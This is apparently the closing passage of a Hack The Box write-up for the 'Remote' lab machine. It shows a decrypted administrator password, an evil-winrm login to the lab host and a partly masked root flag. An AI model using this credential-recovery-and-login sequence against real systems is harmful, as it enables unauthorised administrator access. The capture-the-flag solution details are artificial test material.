[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ python3 decrypt.py
00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
None
!R3m0te!
And we found the password! Now let's use it with evilWinRM:
[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/44_graph.png)